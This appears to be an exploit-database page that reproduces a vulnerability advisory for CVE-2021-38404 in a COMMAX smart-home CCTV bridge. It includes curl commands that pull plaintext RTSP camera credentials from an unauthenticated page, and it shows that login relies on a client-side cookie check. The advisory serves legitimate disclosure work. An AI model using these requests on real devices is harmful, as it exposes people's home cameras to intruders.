COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credential Disclosure
CVE
Category
Price
Severity
CVE-2021-38404
CWE-200
Not specified
High
Author
Risk
Exploitation Type
Date
Mostafa Soliman
High
Remote
2021-08-17
CPE PURL
cpe:cpe:/a:commax:ruvie_cctv_bridge_dvr pkg:https://exploitalert.com/view-details/commax-smart-home-ruvie-cctv-bridge-dvr-service-rtsp-credential-disclosure
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080065 Below is a copy:
COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credential Disclosure COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: n/a
Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.
Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker
to disclose RTSP credentials in plain-text.
Tested on: GoAhead-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5665
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php
02.08.2021
--
$ curl http://TARGET:8086/overview.asp
<HTML>
<HEAD>
<TITLE> Infomation</TITLE>
<script src="./jquery.min.js"></script>
<script src="./jquery.cookie.js"></script>
<script src="./login_check.js"></script>
</HEAD>
<BODY>
<br><br>
<center>
<table>
<tr><td>
<li> [2021/08/15 09:56:46] Started <BR> <li> MAX USER : 32 <BR> <li> DVR Lists <BR>[1] rtsp://admin:s3cr3tP@[email protected] :554/Streaming/Channels/2:554 <BR>
</td></tr>
</table>
</center>
</BODY>
</HTML>
$ curl http://TARGET:8086/login_check.js:
var server_ip = $(location).attr('host');
var server_domain = server_ip.replace(":8086", "");
document.domain = server_domain;
var cookiesAuth = $.cookie("cookiesAuth");
if (cookiesAuth != "authok") {
parent.document.location.href = "http://" + server_domain + ":8086/home.asp";
}
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum